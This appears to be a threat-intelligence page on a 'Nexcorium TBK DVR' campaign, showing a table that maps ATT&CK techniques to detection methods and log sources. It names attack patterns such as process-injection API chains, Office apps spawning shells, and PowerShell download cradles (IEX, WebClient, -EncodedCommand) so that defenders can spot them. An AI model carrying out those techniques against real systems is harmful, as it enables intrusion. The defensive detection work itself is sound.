
Nexcorium TBK DVR Campaign
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
DETECTIONS
Technique ID | Technique Name | Tactic | Detection Method | Log Sources |
Monitor for abnormal cross-process memory operations (OpenProcess → WriteProcessMemory → CreateRemoteThread chain). Alert on legitimate system processes initiating unexpected outbound network connections, which may indicate a hijacked process. | Sysmon EID 8/10, Windows Security EID 4656/4663, EDR process telemetry | |||
Detect anomalous spikes in inbound packets-per-second or bandwidth utilization using threshold-based alerting. Look for geographic distribution anomalies and single-source request rate patterns indicative of botnet coordination. | NetFlow/IPFIX, firewall logs, CDN / scrubbing center metrics | |||
T1080 | Lateral Movement | Alert on executable files (.exe, .dll, .lnk, .bat, .ps1) written to shared network directories. Use File Integrity Monitoring (FIM) to detect hash changes on previously clean files in collaboration shares. | Sysmon EID 11, Windows Security EID 4663, FIM solution logs | |
T1566 | Initial Access | Detonate email attachments in sandbox environments. Detect child process spawning from Office applications (winword.exe, excel.exe → cmd.exe, powershell.exe, wscript.exe). Correlate URL clicks with subsequent download or shell activity on the same host. | Email gateway logs, Sysmon EID 1, proxy/web gateway, MDE alerts | |
T1059 | Execution | Monitor for PowerShell launched with -EncodedCommand or download cradle patterns (IEX, Invoke-Expression, WebClient). Alert on script interpreters spawned by unusual parent processes. Enable AMSI and PowerShell Script Block Logging for full command visibility. | Sysmon EID 1/4104, PowerShell Script Block Log, Windows Security EID 4688, auditd execve |